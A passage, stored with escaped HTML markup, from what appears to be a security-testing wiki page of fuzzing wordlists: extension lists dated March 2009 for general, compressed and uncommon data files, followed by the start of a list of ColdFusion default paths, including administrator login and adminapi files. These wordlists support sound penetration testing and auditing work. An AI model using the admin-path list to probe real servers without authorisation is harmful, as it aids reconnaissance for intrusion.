.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
